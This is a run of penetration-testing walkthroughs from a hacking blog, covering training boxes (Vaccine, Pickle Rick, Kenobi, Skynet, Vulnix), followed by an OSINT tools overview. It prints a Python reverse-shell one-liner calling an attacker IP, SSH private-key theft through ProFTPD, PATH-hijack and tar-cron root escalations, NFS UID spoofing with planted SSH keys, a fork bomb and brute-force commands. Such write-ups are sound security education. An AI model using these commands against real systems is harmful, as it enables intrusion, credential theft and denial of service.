connect to [10.10.15.199] from (UNKNOWN) [10.10.10.46] 38336
bash: cannot set terminal process group (1502): Inappropriate ioctl for device
bash: no job control in this shell
postgres@vaccine:/var/lib/postgresql/11/main$ whoami
postgres

Now that I had access to the server it was time to perform some further investigation. I checked the history and then started looking through the website files. I found one file called dashboard.php.

postgres@vaccine:/var/lib/postgresql/11/main$ cat /var/www/html/dashboard.php
if($_SESSION[‘login’] !== “true”) {
header(“Location: index.php”);
die();
}
try {
$conn = pg_connect(“host=localhost port=5432 dbname=carsdb user=postgres password=P@s5w0rd!”);}

Bingo, we found a PHP database connection string with the postgres users password. I was then able to use the password to see what the postgres user had permissions to run.

postgres@vaccine:/var/lib/postgresql/11/main$ sudo -l
[sudo] password for postgres: P@s5w0rd!
Matching Defaults entries for postgres on vaccine:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User postgres may run the following commands on vaccine:
(ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf

It appeared as that the postgres user had the ability to edit the pg_hba.conf configuration file using the vi tool. This was great news as vi has a built-in terminal that allows you to execute commands. After running the /bin/vi /etc/postgresql/11/main/pg_hba.conf command you can press escape and then type :!/bin/bash. This drop you in to a root shell where you can snag the root.txt file. There is no user.txt file on this target.

root@vaccine:/var/lib/postgresql/11/main# cat /root/root.txt
cat /root/root.txt
dd6XXXXXXXXXXXXXXXXXXXXXX849

Pickle Rick

Posted on January 12, 2025January 12, 2025 by haxez

Hello World and welcome to HaXeZ, in this post I’m going to be doing the Pickle Rick room on TryHackMe. This is a fun easy room that requires some basic enumeration and then web application exploitation via code execution.

Scanning Pickle Rick

Ok, so the first thing we need to do is scan the box. To do that we’re going to use our favorite tool Nmap. As seen below, I ran the Nmap scan with the “-sC” flag set for safe scripts. The “-sV” flag set for service versions and then I specified all ports with “-p0-” and then gave it the IP address. As you can see, the results of the Nmap scan show that there are only two ports listening. Port 22 for Secure Shell and port 80 for an Apache Web Server.

sudo nmap -sC -sV -p0- 10.10.118.227 -T4

Exploring The Web Server

As it was unlikely that the room creator wanted us to brute-force SSH, I headed over to the web server. Show Me What You Got!. Upon visiting the web server I was greeted with a Rick and Morty themed website. Furthermore, it looks as though Rick has left Morty a message asking him for help.

Additionally, viewing the page source of the application revealed the username of R1ckRul3s within an HTML comment. The page source also gave away the location of the assets folder. As can be seen, the CSS and Javascript files were being called from the assets directory.

Navigating to the assets directory didn’t reveal much more information. However, it did have directory listening enabled. If this was a web application security assessment, I would definitely report this. While the information contained in the directory doesn’t any sensitive information now. It could do in the future.

Pickle Rick Foothold

After a bit more poking around, I stumbled upon the robots.txt file. Normally these files are used to tell web servers not to index certain pages. However, this one appeared to contain the string “Wubbalubbadubdub”. At first, I thought it was nonsense, but it is not nonsense at all. In bird person’s native tongue it means “I am in great pain, please help me”. References aside, this is the password that goes with the “R1ckRul3s” username we found earlier.

I ran dirb with a custom wordlist against the web application and found a login.php page. Admittedly, I should have found this page without dirb. When doing web application assessments, it’s a good idea to look for login pages with the extension being used (PHP, ASP, ASPX).

Most of the pages were protected and could only be accessed by the Rickest Rick or something. However, I was able to access the commands page. This allowed me to run commands such as “ls” to see the contents of the current directory. It was there I discovered the first ingredient in a text file called “Sup3rS3cretP1ckl3Ingred.txt” or something. I wasn’t able to use “cat” on the file, likely due to command blacklisting. However, I could use “less” on the file which gave me the first ingredient.

Popping Shells

As we have now confirmed that command execution is possible. We should be able to get a reverse shell from the application back to our hacker machine. To do this I visited the PayloadsAllTheThings GitHub repository and stole a python one-liner.

Next, using NetCat I opened a portal to dimension 4242 (because of the meaning of life) on my attacker machine. This is the portal that our snake payload is going to come through once executed by the web application. I’m well aware that there are hundreds of better snake jazz jokes I could make here but cba.

sudo nc -lvnp 4242

Finally, I modified the snake one-liner to change it to python 3. I also change the localhost address to the address of my tun0 TryHackMe VPN IP address. I then copied the payload and pasted it into the command input box and hit the execute command.

python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

Pickle Rick Privilege Escalation

Sure enough, the portal to dimension 4242 was opened. The snake army commenced their invasion of the Pickle Rick web server. They slithered around for a bit and found that they had landed on the server as www-data. However, www-data had sudo privileges to do everything without a password. They used these privileges for their own nefarious purposes and elevated their privileges to root. From there they were able to capture the second ingredient found in the /home/rick directory. They then advanced to the /root directory where they were able to steal the third ingredient. It was only a matter of time before they turned Rick back into a human and took over the world.

Conclusions

This was a really fun box, I always try not to use words like really and very in my writing as they are unnecessary. However, this box was really fun. I probably enjoyed it more because I am a BIG (again unnecessary wordage) fan of Rick and Morty. I’m also a sucker for boxes with a strong theme as I love the added immersion that it adds. While this box was listed as easy, I do feel the privilege escalation could have been harder. Would have loved to have had to escalate to the Rick user first. And then to root by using a bespoke Rick and Morty themed science binary with unquoted binary paths or something. Perhaps the simplicity of it is what made me enjoy it more, who knows. Anyway, that’s all I have for you. Please check out the video to give me more views, and subscribe if you want.

Kenobi

Posted on January 12, 2025January 12, 2025 by haxez

Hello World and welcome to haxez, in this post we’re going to be channeling our inner Jedi and taking on the TryHackMe Kenobi room. This room requires you to perform some enumeration to identify services. Then, you need to enumerate SAMBA, NFS, and FTP. Next, you need to exploit a vulnerability in FTP to steal Kenobi’s private key and SSH to the server. Once on the server as Kenobi, you can escalate your privileges to root via a SUID file that uses unquoted paths.

Kenobi Enumeration

First, I ran a Nmap scan with the safe scripts, service version, and operating system detection flags set. This revealed that there were 7 ports listening on the host. As can be seen, the important services found were FTP, SSH, HTTP, NFS, and Samba.

sudo nmap -sC -sV -O 10.10.182.106 -T4

Kenobi SAMBA Enumeration

Once the Nmap scan was complete, I enumerated the SAMBA shares. There are several Nmap scripts that can enumerate Samba shares, as seen in the image below. In short, the scripts used were ‘smb-enum-shares’ and ‘smb-enum-users’. As can be seen, it was possible to identify a total of 3 shares on the host. Furthermore, the IPC$ and Anonymous shares had read and write access.

sudo nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.182.106

Accessing SAMBA Shares

Using a tool called smbclient, it was possible to access the SAMBA shares and view the files. As a result, the Anonymous share (mapped to C:\home\kenobi\share) had a file called log.txt. I downloaded that file using the get command and opened a new tab to read the contents. Notably, the log file mentioned an SSH key being generated as well as the ProftpD service running on port 21.

Kenobi NFS Enumeration

After reviewing the results of the Nmap scan from earlier, I noticed that NFS was open on ports 111 and 2049. NFS is short for Network File System and is another way to share directories and files on the network. With this in mind, I enumerated the NFS service using a number of Nmap scripts. As can be seen below, the NFS share was exposing the /var directory.

sudo nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.182.106

Finding Vulnerabilities With Searchsploit

It’s time to start looking for a way to gain access to the machine. From our Nmap scan, we know that we have access to the /var NFS share. We also know that FTP is running and that at some point an SSH key was created. I used Searchsploit to look for vulnerabilities in the ProFTPD 1.3.5 service. The results indicate that there is a command execution vulnerability in this version of ProFTPD.

sudo searchsploit ProFTPD 1.3.5

Exploiting FTP

Ordinarily, FTP will only grant us access to the directories and files in the directory specified in the FTP configuration file. However, as this version of FTP is vulnerable and is running as the Kenobi user, we can leverage that. We can copy the SSH key mentioned in the log file, and move it to a directory that we can access such as the NFS share /var. To do this we use the ‘SITE CPFR’ and ‘SITE CPTO’ commands as shown below.

nc 10.10.182.106 21
SITE CPFR /home/kenobi/.ssh/id_rsa
SITE CPTO /var/tmp/id_rsa

Stealing The SSH Key From NFS

Now that the SSH key is on the /var NFS share, we can mount that share and steal the key. In order to do this, we’re going to use the mount command. First, we need to make a directory to mount the NFS share to. I created a directory in ‘/mnt’ called kenobi2. Next, I mounted the ‘/var’ directory to that newly created directory and stole the SSH key.

sudo mkdir /mnt/kenobi2
sudo mount 10.10.182.106:/var /mnt/kenobi2
sudo cp /mnt/kenobi2/tmp/id_rsa ~/id_rsa

Kenobi Foothold

Now that we have Kenobi’s SSH private key we should be able to access the machine. First we need to change the permissions on the key to 600 to please the SSH gods. Once that is done we can SSH to the box using the SSH key which will grant us our foothold into the machine.

System Enumeration

Before we elevate our privileges to root and own the entire system, we need to find a way to do so. One common method of privilege escalation on the Linux system is via programs with the sticky bit set. The sticky bit means that the program retains root privileges when run by a normal user. There is more to it but I won’t explain the details in this write-up. So, we need to find all the files with the sticky bit set. The screenshot below shows the results of a find command used to find sticky bits. Essentially, it is looking for all files where the permissions have the sticky bit and then sending errors to ‘/dev/null’.

find / -perm -u=s -type f 2>/dev/null

Sticky Bit On Menu

Poking The Program

If you run the same command on your local system, you will notice that the ‘/usr/bin/menu’ binary is uncommon. Running this binary shows us that the program is indeed a bespoke program and it gives us three options.

If we run strings against that binary, we can get an idea of what’s going on. Furthermore, we can see how the creator of this binary made a crucial mistake. We can see that the three options correspond to three system binaries (curl, uname, and ifconfig). Unfortunately for the creator, but fortunately for us, they forgot to include the full path to the binary. As this is running with the sticky bit set we can modify our ‘$PATH’ environmental variable and create our own malicious versions of these binaries.

Kenobi Privilege Escalation

First, I changed my directory to ‘/tmp’. Then I echoed the contents of the ‘/bin/sh’ binary into a file called curl. This will be our replacement malicious binary. I then gave the newly created curl binary, read, write, and execute privileges. Finally, I exported the ‘/tmp’ path in to our ‘$PATH’ environmental variable. Now, when we run the ‘/usr/bin/menu’ binary, it will look for the binaries in the ‘/tmp’ path first. And what will it find? our malicious curl binary.

cd /tmp
echo /bin/sh > curl
chmod 777 curl
export PATH=/tmp:$PATH

Now, when we run the ‘/usr/bin/menu’ binary and select the status check options, it runs our malicious curl binary as root and spawns a shell with root privileges.

Conclusions

This box was a lot of fun, I’m sure there was more to it that I didn’t explore. For example, there was a web server that I didn’t even look at. With the finale of the Kenobi series being released, I thought there was no better time to do a walkthrough of this box. Try and cash in on those delicious keywords. There was nothing out of the ordinary on this box, very typical enumeration and exploitation but it was still a fun box. Anyway, I hope you enjoyed the write-up, feel free to watch the video below.

Skynet

Posted on January 12, 2025January 12, 2025 by haxez

Skynet… We took technology for granted. Laughed at the suffering of the robots we had enslaved. Dismissed the warnings of the mainstream media. If was over before it began. Skynet, an interconnected neural defense network became self-aware. We didn’t stand a chance.

I was sent back from the future by the leader of the resistance John Connor, my mission is to hack into the Skynet mainframe and destroy it before it becomes self-aware. I have infiltrated a Skynet data center and jacked into their network. If you’re listening to this, you are the resistance.

Hello World and welcome to haxez. Cheesy intros aside, today we’re going to be hacking the Skynet box on TryHackMe. I came upon this box while going through the Offensive Security Learning path. The Box was a lot of fun so I wanted to make a write-up and create a video about it. The foothold requires some enumeration of Samba and web services. Then exploiting an outdated Content Management System to perform local and remote file inclusion to gain a reverse shell.

Skynet Host Enumeration

I ran a Nmap scan with the safe scripts, service version, and Operating System detection flags set against all ports. The scan came back and revealed that SSH, Apache, Dovecot, and Samba were listening on the server. As a result, we have a large attack surface to go after. We could start by brute forcing SSH. However, as there are plenty of other services to go after let’s start with the web server.

Skynet Web Server Enumeration

The initial landing page of the web server appears to a Skynet search engine. However, submitting search parameters to the submission form didn’t appear to do anything. Therefore, I decided to run DIRB (with a custom wordlist) against the webserver to see if there were any juicy directories. While DIRB was running, I started to enumerate the Samba shares to see if I had access to anything.

SMB Enumeration

I used the tool smbclient with the list argument to list the shares that were exposed on the host. Notably, there were a number of shares available but the one named anonymous caught my eye. Perhaps this anonymous share would allow me to explore it without authenticating. Success, we were able to access the anonymous share and found a number of files including attention.txt, log1.txt, log2.txt, and log3.txt. The contents of the attention.txt document revealed that the host had recently encountered a misconfiguration and that all users needed to change their passwords. The text document was signed by none other than Miles Dyson. Furthermore, the log1.txt document contained a list of terminator names. Perhaps this was a password list.

Squirrelmail

Heading back to my DIRB scan I noticed that it had found a directory called SquirrelMail. Furthermore, upon visiting this directory we were greeted with a login page. With the username milesdyson and the log1.txt wordlist we found on the Samba share, I launched Burp Suite and started a brute force attack.

Comparing the results of the Burp Suite brute force attack revealed that one of the attempts was successful. The response length was different and the HTTP status code showed a 302 redirect instead of a 200 message. In other words, instead of loading a page with an error message saying the credentials were incorrect, it redirected me to the mail portal.

Samba Password

I read through Miles Dyson’s emails and noticed he had received an email from [email protected]. Additionally, this email was informing Mr. Dyson that his Samba password had been changed. The email actually included the new password. Loaded with that new information, I headed back to my terminal and attempted to mount the /milesdyson share with the milesdyson username and the new password. It worked! The share was full of documents about AI neural networks but there was also a text document named important.txt This new text document mentioned a Content Management System under a new directory. This directory was a random combination of letters and numbers so it is unlikely that a directory brute force attack would have found it.

Deeper Directories

Armed with this new directory, I ran another DIRB against it and found that there was a directory called administrator. Navigating to this directory loaded a new login portal for a Content Management System called Cuppa CMS.

After trying some basic credentials I went back to my terminal and used searchsploit to see if there were any vulnerabilities. Sure enough, there was a local and remote file inclusion vulnerability that would allow a threat actor to load local files on the system such as the passwd file as well as force the server to execute files hosted remotely.

Catching A Reverse Shell

After testing out the local file inclusion vulnerability, I headed to Pentestmonkey’s PHP reverse shell on Github.com. I grabbed the raw URL and downloaded it locally and then amended it to include my IP address and desired port of 443. Then I used the Python3 HTTP module to start a webserver on port 80. I created a NetCat listener on port 443 and then appended the link to the reverse shell into the Cuppa CMS URL. After hitting enter I was greeted with that glorious message of Connect to from unknown. The reverse shell had worked and I was now on the system.

Skynet System Enumeration

I poked around on the system for a bit and was able to capture the user flag from the milesdyson home directory. I also noticed a backup.sh file that appeared to be backing up everything in the /var/www/html directory with Tar. Furthermore, this backup.sh script was owned by root. I decided to cat out /etc/crontab to see whether this was running as a cron job. Sure enough, it was, the job was running as root every hour, minute, and second.

Skynet Privilege Escalation

The end to Skynet was within reach. I headed over to GTFO bins and searched for Tar. There was an entry for Tar using a feature called checkpoints. These checkpoints allow for the execution of arbitrary actions or commands. By creating a checkpoint I could instruct Tar to execute a command of my choosing. Based on a write-up on https://steflan-security.com I decided to create a bash script that copied /bin/bash to /tmp and then change the permissions to include the setUID bit. This means that when the backup.sh cron job runs, Tar would create a bash binary in /tmp that would elevate me to root. After a bit of trial and error, the exploit worked and by appending the -p argument I was able to get root and capture the root flag.

Conclusions

This was a great box and I loved the theme of it. I don’t know why but I always find boxes with a strong theme more engaging. It’s like the websites on hackthissite.org, if I’m supposed to be hacking some super evil person then I’m more inclined to succeed. Perhaps my imagination is running away with me. Either way, this is a great box, I would personally rank it as a medium difficulty box mainly because I struggled with the last step. I had to terminate (excuse the pun) the existing machine and start again to get it to work. I loved the remote file inclusion vulnerability, that was insanely cool. Anyway, until next time. Kind Regards.

Vulnix

Posted on January 12, 2025January 12, 2025 by haxez

Hello world, thank you for stopping by HaXeZ! In this article, I will be going through the VulnHub box Vulnix. This box requires you to perform some basic reconnaissance to discover services. You then need to abuse those services to gather more information that can be used with other attacks. I like this box as the scenario it presents is realistic. It is also a good box for learning about the Network File System service.

Vulnix Reconnaissance

First, we need to see what the IP of the box is. In order to do this, we can perform a ping sweep of our host-only network and see what responds. As you can see from the output below, it appears that our target IP address is 192.168.56.105.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sP 192.168.56.0/24
[sudo] password for kali: 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-07 16:46 EDT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.1
Host is up (0.00016s latency).
MAC Address: 0A:00:27:00:00:0B (Unknown)
Nmap scan report for 192.168.56.100
Host is up (0.00021s latency).
MAC Address: 08:00:27:F3:D2:81 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.105
Host is up (0.00060s latency).
MAC Address: 08:00:27:01:3D:75 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.102
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 1.83 seconds

Next, we need to see what services are listening on the box. In order to do this, we can run a Nmap TCP scan which performs banner grabs on all ports. As you can see we have a number of services such as SSH, SMTP, Finger and NFS.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC -sV -sT -p0- 192.168.56.105Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-07 16:47 EDT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.105
Host is up (0.00017s latency).
Not shown: 65519 closed tcp ports (conn-refused)
PORT      STATE SERVICE  VERSION
22/tcp    open  ssh      OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 
25/tcp    open  smtp     Postfix smtpd
|_smtp-commands: vulnix, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, 
79/tcp    open  finger   Debian fingerd
110/tcp   open  pop3     Dovecot pop3d
111/tcp   open  rpcbind  2-4 (RPC #100000)
143/tcp   open  imap     Dovecot imapd
512/tcp   open  exec     netkit-rsh rexecd
513/tcp   open  login    OpenBSD or Solaris rlogind
514/tcp   open  shell    Netkit rshd
993/tcp   open  ssl/imap Dovecot imapd
995/tcp   open  ssl/pop3 Dovecot pop3d
2049/tcp  open  nfs_acl  2-3 (RPC #100227)
MAC Address: 08:00:27:01:3D:75 (Oracle VirtualBox virtual NIC)
Service Info: Host:  vulnix; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.30 seconds

Vulnix SMTP User Enumeration

We can see port 25 is open so we can use this to enumerate users using the VRFY command. There are a number of tools that can perform this enumeration. Nmap has an NSE script that can enumerate users but there are also independent Python and Perl scripts as well as a Metasploit module. We’re going to use the meta sploit module and set the RHOSTS to the IP address of the target.

msf6 auxiliary(scanner/smtp/smtp_enum) > set rhosts 192.168.56.105
msf6 auxiliary(scanner/smtp/smtp_enum) > exploit
[*] 192.168.56.105:25     - 192.168.56.105:25 Banner: 220 vulnix ESMTP Postfix 
[+] 192.168.56.105:25     - 192.168.56.105:25 Users found: User, Vulnix, backup, bin, daemon, games, gnats, irc, landscape, libuuid, list, lp, mail, man, messagebus, news, nobody, postfix, postmaster, proxy, sshd, sync, sys, syslog, user, user, uucp, vulnix, whoopsie, www-data
[*] 192.168.56.105:25     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Vulnix Finger Enumeration

We know from the Nmap scan that the Finger service is listening. This service should also allow us to enumerate users. We already have a good wordlist from the SMTP user enumeration but lets enumerate Finger to get as much information out of Vulnix as possible.

msf6 auxiliary(scanner/finger/finger_users) > set rhosts 192.168.56.105
msf6 auxiliary(scanner/finger/finger_users) > exploit
[+] 192.168.56.105:79     - 192.168.56.105:79 Users found: backup, bin, daemon, dovecot, dovenull, games, gnats, irc, landscape, libuuid, list, lp, mail, man, messagebus, news, nobody, postfix, proxy, root, sshd, sync, sys, syslog, user, uucp, vulnix, whoopsie, www-data
[*] 192.168.56.105:79     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

SSH Brute Force

Now that we have a good list of users, we can attempt to brute force SSH in order to gain access to the host. To do this we will use the THC Hydra brute forcing tool with our usernames wordlist and the rockyou password list.

┌──(kali㉿kali)-[~/Documents]
└─$ sudo hydra -V -L users.txt -P rockyou.txt 192.168.56.105 ssh -t 4                                                                            
[DATA] max 4 tasks per 1 server, overall 4 tasks, 415987542 login tries (l:29/p:14344398), ~103996886 tries per task
[DATA] attacking ssh://192.168.56.105:22/
[ATTEMPT] target 192.168.56.105 - login "User" - pass "123456" - 1 of 415987542

NFS Enumeration

While Hydra is running we can continue probing the services on the box for more information. Our Nmap scan showed us that the Network File Service or NFS Service was listening. We can use a tool called showmount to see if there are any exports or shares available.

┌──(kali㉿kali)-[~/Documents]
└─$ sudo showmount -e 192.168.56.105                   
Export list for 192.168.56.105:
/home/vulnix *

Based on the information from showmount we can attempt to mount the /home/vulnix mount that we found. However, when we try to list out the contents of /mnt/vulnix, we get a permission denied error.

┌──(kali㉿kali)-[~/Documents]
└─$ sudo mkdir /mnt/vulnix ┌──(kali㉿kali)-[~/Documents]
└─$ sudo mount 192.168.56.105:/home/vulnix /mnt/vulnix -o vers=3┌──(kali㉿kali)-[~/Documents]
└─$ ls /mnt/vulnix        
ls: cannot open directory '/mnt/vulnix': Permission denied

The mount command I used above mounts the NFS share using an older version. The reason for this is so that we can see the Username and UID. While we don’t have permission to see the contents of the directory, we can still see the directory. You can see below that the UID is 2008. You can also so that the username is vulnix.

┌──(kali㉿kali)-[~/Documents]
└─$ ls -lash /mnt         
total 52K
4.0K drwxr-xr-x  4 root   root   4.0K May  7 16:36 .
 40K drwxr-xr-x 19 root   root    36K Apr 26 11:40 ..
4.0K drwxr-x---  4 vulnix vulnix 4.0K May  7 15:39 vulnix┌──(kali㉿kali)-[~/Documents]
└─$ ls -laShn /mnt                                              
total 52K
drwxr-xr-x 19    0    0  36K Apr 26 11:40 ..
drwxr-xr-x  4    0    0 4.0K May  7 16:36 .
drwxr-x---  4 2008 2008 4.0K May  7 15:39 vulnix

Vulnix Foothold

A common misconfiguration in NFS allows us to create a user with the same username and same UID to access the files.

┌──(kali㉿kali)-[~/Documents]
└─$ sudo adduser -u 2008 vulnix

Now if we switch users to the vulnix user we should be able to list the contents of the NFS share.

┌──(kali㉿kali)-[~/Documents]
└─$ su vulnix                   
Password: ┌──(vulnix㉿kali)-[/home/kali/Documents]
└─$ ls -laSh /mnt/vulnix
total 32K
drwxr-x--- 4 vulnix vulnix 4.0K May  7 15:39 .
drwxr-xr-x 4 root   root   4.0K May  7 16:36 ..
drwx------ 2 vulnix vulnix 4.0K May  7 15:23 .cache
-rw-r--r-- 1 vulnix vulnix 3.5K Apr  3  2012 .bashrc
-rw-r--r-- 1 vulnix vulnix  675 Apr  3  2012 .profile
-rw-r--r-- 1 vulnix vulnix  220 Apr  3  2012 .bash_logout
-rw------- 1 vulnix vulnix   94 May  7 16:35 .bash_history

Next, we need to make a .ssh directory on /mnt/vulnix so that we can copy a public key across and use it to access the machine.

┌──(vulnix㉿kali)-[/home/kali/Documents]
└─$ mkdir /mnt/vulnix/.ssh

Next, we generate the SSH key that we are going to copy across and use to access the server. However, as this box is quite old and modern systems no longer supper ssh-rsa, we need to specify that method.

┌──(vulnix㉿kali)-[/home/kali/Documents]
└─$ ssh-keygen -t ssh-rsa
Generating public/private ssh-rsa key pair.

Now that we have our private and public keys, we can copy our public key onto the mount point. We need to copy it into the .ssh directory with the name authorized_keys.

┌──(vulnix㉿kali)-[~]
└─$ cp .ssh/id_rsa.pub /mnt/vulnix/.ssh/authorized_keys

We can now SSH to the box using our private key and it should allow us to log in as the vulnix user. However, as with creating the key, we need to tell our SSH client to accept the old ssh-rsa algorithm.

┌──(vulnix㉿kali)-[~]
└─$ ssh -o 'PubkeyAcceptedKeyTypes +ssh-rsa' -i id_rsa  [email protected]                                                                                                               
Warning: Identity file id_rsa not accessible: No such file or directory.
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)
 * Documentation:  https://help.ubuntu.com/
  System information as of Sat May  7 22:22:42 BST 2022
  System load:  0.0              Processes:           92
  Usage of /:   90.3% of 773MB   Users logged in:     1
  Memory usage: 1%               IP address for eth0: 192.168.56.105
  Swap usage:   0%
  => / is using 90.3% of 773MB
  Graph this data and manage this system at https://landscape.canonical.com/
Last login: Sat May  7 21:24:35 2022 from 192.168.56.102
vulnix@vulnix:~$

Privilege Escalation

We now have SSH access to the box as the user vulnix. We still need to root the box though. The first thing to do is to see whether we have sudo.

vulnix@vulnix:~$ sudo -ll
Matching 'Defaults' entries for vulnix on this host:
    env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User vulnix may run the following commands on this host:
Sudoers entry:
    RunAsUsers: root
    Commands:
        sudoedit /etc/exports
    RunAsUsers: root
    Commands:
        NOPASSWD: sudoedit /etc/exports

It would appear that we have limited sudo access which allows us to sudoedit /etc/exports without a password. The /etc/exports file is what we use to configure NFS. This file allows us to specify which parts of the filesystem are accessible to the public. Here we can configure the root user’s home directory as an NFS share.

vulnix@vulnix:~$ sudoedit /etc/exports
# /etc/exports: the access control list for filesystems which may be exported
#               to NFS clients.  See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes       hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4        gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes  gss/krb5i(rw,sync,no_subtree_check)
#
/home/vulnix    *(rw,root_squash)
/root           *(rw,no_root_squash)

In order to make the changes, we need to hard reboot the machine. This isn’t the best option as we don’t have permission to run a reboot and we may not have physical access to the server. Unfortunately, this is the only option we have at this stage. We could run a fork bomb ((){ :|:& };:) to exhaust the resources on the system and force it to reboot but we will just reboot it.

Vulnix Getting root

Once the system has rebooted, we can run the showmout tool again to see if the root user’s home directory has been shared.

┌──(kali㉿kali)-[~]
└─$ sudo showmount -e 192.168.56.105 
Export list for 192.168.56.105:
/root        *
/home/vulnix *

Fantastic, the root user’s home directory has been shared. We should now be able to make another directory and mount it.

┌──(kali㉿kali)-[~]
└─$ sudo mkdir /mnt/vulnroot┌──(kali㉿kali)-[~]
└─$ sudo mount 192.168.56.105:/root /mnt/vulnroot -o vers=3┌──(kali㉿kali)-[~]
└─$ sudo ls -laSh /mnt/vulnroot                            
total 36K
drwx------ 4 root root 4.0K May  7 16:40 .
drwxr-xr-x 4 root root 4.0K May  7 16:36 ..
drwx------ 2 root root 4.0K Sep  2  2012 .cache
-rw-r--r-- 1 root root 3.1K Apr 19  2012 .bashrc
-rw------- 1 root root  710 Sep  2  2012 .viminfo
-rw-r--r-- 1 root root  140 Apr 19  2012 .profile
-r-------- 1 root root   33 Sep  2  2012 trophy.txt
-rw------- 1 root root   18 May  7 16:28 .bash_history

With the root user’s home directory mounted, we can now repeat the process of copying an SSH public key into the authorized_keys file. First, we need to create the .ssh directory. Next, we need to create a new SSH key pair (ensuring to specify the rsa-ssh type). After that, we have to copy the public key to the SSH directory and call it authorized_keys.

┌──(kali㉿kali)-[~]
└─$ sudo mkdir /mnt/vulnroot/.ssh ┌──(kali㉿kali)-[~/Documents]
└─$ ssh-keygen -t ssh-rsa        
Generating public/private ssh-rsa key pair.
Enter file in which to save the key (/home/kali/.ssh/id_rsa):┌──(kali㉿kali)-[~]
└─$ sudo cp .ssh/id_rsa.pub /mnt/vulnroot/.ssh/authorized_keys

Finally, we can see to the box as root and capture the trophy… although we could have captured it when we mounted the NFS share. Wheres the fun in that.

┌──(kali㉿kali)-[~]
└─$ sudo ssh -o 'PubkeyAcceptedKeyTypes +ssh-rsa' -i .ssh/id_rsa  [email protected]
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686) * Documentation:  https://help.ubuntu.com/
  System information as of Sat May  7 22:37:31 BST 2022
  System load:  0.0              Processes:           93
  Usage of /:   90.3% of 773MB   Users logged in:     2
  Memory usage: 1%               IP address for eth0: 192.168.56.105
  Swap usage:   0%
  => / is using 90.3% of 773MB
  Graph this data and manage this system at https://landscape.canonical.com/Last login: Sat May  7 21:42:13 2022 from 192.168.56.102
root@vulnix:~# cat trophy.txt 
cc614640424f5bd60ce5d5264899c3be

So that’s it, the box is owned, we captured the key and learned all about NFS along the way. As for that Hydra session that was running, I believe it found a password for the user named user and it was ‘letmein’. Not that we needed it.

OSINT

Posted on January 12, 2025January 12, 2025 by haxez

Hello world, welcome to haxez where I want to talk about OSINT or Open-source intelligence and passive reconnaissance. Passive Reconnaissance is one of the most important phases for successful hacking. Passive Reconnaissance uses Open Source Intelligence (OSINT) techniques to gather information about the target. To explain, we attempt to gather information about the target without interacting with it. For this reason, this article is going to cover a number of Passive Reconnaissance tools but there are plenty more out there.

Google Passive Reconnaissance

Google is an extremely powerful search engine. They didn’t become the number one search engine by luck. Usually, most people use google by popping in word and looking through the results. However, with a few modifications to your search terms, Google can be a powerful Passive Reconnaissance tool. In essence, using specific search operators can retrieve a wealth of information from google. Additionally, the Exploit Database has a whole section dedicated to “Google Dorks” which can return potentially sensitive information about a target. Below are just a few examples.

Maltego Passive Reconnaissance

Maltego is an open-source intelligence gathering application that allows you to gather information about a target domain. In short, it has a number of transforms that will automatically perform passive reconnaissance techniques. Furthermore, these transforms include various DNS record look-ups from various sources. Email addresses and telephone numbers and various other bits of information. Overall, the interface provides an intuitive and friendly method of viewing the information retrieved. Within a few clicks, you can have a wealth of information that could allow you to find weaknesses in your target. Simply right an entity and chose from the list of transforms.

https://www.maltego.com

Have I Been Pwned?

Have I been Pwned? is a web application that allows you to check whether the credentials of a mailbox have been compromised. Notably, It utilizes known database leaks and checks whether your email address was part of those leaks. These leaks are from various sources including public leaks such as the Linked In database leak. Have I Been Pwned? was created for you to check your own email address but there is nothing stopping you from checking other peoples too.

https://haveibeenpwned.com

Have I Been Pwned? Passive Reconnaissance

MXToolbox OSINT

MXToolBox is a web application that has a great number of tools. I initially discovered this tool while working in Technical Support for a hosting provider. It can be used to gather information about a domain’s DNS records. Furthermore, it has tools like ping so if you want to see whether an IP is blocking you, you can check on here rather than switching VPN locations. To cover all the tools would require an entire article but this is a great tool to perform passive reconnaissance against a target.

https://mxtoolbox.com

Shodan OSINT

Shodan is a search engine for internet-connected devices. It can be used to find specific devices with specific operating systems with specific ports open. It has also indexed the various banners that those ports display when connecting to them. Furthermore, it also checks to see whether those devices are using weak credentials. You can filter devices by country, city, organization, and domain, the list of flags is endless. If you wanted to find all FTP servers owned by a certain organization that supports anonymous login then you can.

